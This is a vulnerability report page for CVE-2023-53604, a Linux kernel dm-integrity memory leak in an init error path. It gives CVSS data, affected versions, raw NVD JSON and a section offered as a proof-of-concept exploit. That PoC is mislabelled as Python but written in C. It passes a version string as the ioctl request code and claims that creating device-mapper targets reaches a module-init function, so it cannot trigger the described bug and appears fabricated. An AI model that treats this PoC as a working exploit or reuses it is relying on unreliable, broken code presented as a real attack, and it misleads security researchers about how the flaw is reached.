Security Vulnerability Report
中文
CVE-2023-53604 CVSS 7.8 HIGH

CVE-2023-53604

Published: 2025-10-04 16:15:57
Last Modified: 2026-03-23 18:25:32
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: dm integrity: call kmem_cache_destroy() in dm_integrity_init() error path Otherwise the journal_io_cache will leak if dm_register_target() fails.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 6.6 (修复前版本)
Linux Kernel 6.6.x (修复前)
Linux Kernel 6.1.x (LTS修复前)
Linux Kernel 5.15.x (LTS修复前)
Linux Kernel 5.10.x (LTS修复前)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* PoC for CVE-2023-53604 - dm-integrity memory leak * This PoC demonstrates the memory leak by repeatedly attempting * to initialize dm-integrity in a way that triggers the error path. * * Note: This requires kernel module manipulation capabilities. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <sys/ioctl.h> #define DM_IOCTL 0xfd #define DM_VERSION "4.47.0" struct dm_ioctl { unsigned int version[3]; unsigned int data_size; unsigned int data_start; unsigned int target_count; unsigned int open_count; unsigned int flags; unsigned int event_nr; unsigned int padding; unsigned int dev; char name[128]; char uuid[129]; char data[7]; }; int main(int argc, char *argv[]) { int fd; struct dm_ioctl ioctl_data; int iterations = (argc > 1) ? atoi(argv[1]) : 100; printf("CVE-2023-53604 PoC - dm-integrity memory leak\n"); printf("Triggering %d initialization attempts...\n", iterations); fd = open("/dev/mapper/control", O_RDWR); if (fd < 0) { perror("Cannot open /dev/mapper/control"); printf("This PoC requires root privileges and dm-integrity support\n"); return 1; } /* Attempt to create dm-integrity targets that will fail, * triggering the error path that leaks journal_io_cache */ for (int i = 0; i < iterations; i++) { memset(&ioctl_data, 0, sizeof(ioctl_data)); ioctl_data.version[0] = 4; ioctl_data.version[1] = 47; ioctl_data.version[2] = 0; ioctl_data.data_size = sizeof(ioctl_data); ioctl_data.data_start = sizeof(ioctl_data); snprintf(ioctl_data.name, sizeof(ioctl_data.name), "test%d", i); /* This will trigger dm_integrity_init() -> potentially fail * without cleaning up journal_io_cache */ if (ioctl(fd, DM_VERSION, &ioctl_data) < 0) { // Expected to fail, but leak memory each time } } close(fd); printf("Done. Check /proc/slabinfo for journal_io_cache entries.\n"); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53604", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:57.057", "lastModified": "2026-03-23T18:25:31.703", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndm integrity: call kmem_cache_destroy() in dm_integrity_init() error path\n\nOtherwise the journal_io_cache will leak if dm_register_target() fails."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.12", "versionEndExcluding": "4.14.315", "matchCriteriaId": "0354290C-2C4B-4E22-866A-F093DF0E3222"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.283", "matchCriteriaId": "8AC1BC2D-A61C-4368-A3F6-50DF48E2EFC5"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.243", "matchCriteriaId": "E54ACEF5-C8C1-4266-85FC-7D513FFD1DEC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.180", "matchCriteriaId": "78422AC3-CC89-479E-B4BC-62381D8F3564"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.111", "matchCriteriaId": "2B9DD776-7F17-4F72-B94F-54BFCBC692DD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.28", "matchCriteriaId": "08F855F4-7188-4EE1-BD79-D4B6C7E2EF54"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.15", "matchCriteriaId": "3844A90B-940D-46C3-8D7B-9FF63F1AFC2F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.3", "versionEndExcluding": "6.3.2", "matchCriteriaId": "38F6F330-91A0-4675-8B90-6F950471A7CC"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/3877b5c1509b16eeb1f275228fd91789cd88cf17", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/44f29e93a55b544dc961b6f8b4e93abaeaafb9ee", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6b79a428c02769f2a11f8ae76bf866226d134887", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6d126899b0747305c9d39a0bcf87e0df9c3f555b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a5d8c6bf58e5b2e70fbc15f3b08dfc1ba6f269ac", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c8c9c50268729bf35f6c9bb1205f490db920454e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ca8b634fdf07dee3f6dfde57079c4511480b525e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e09a592fdd6c716506774bdbebb5f6c537b47767", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ff4d6b5b38429a7731e5593680d2138bf74dd546", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.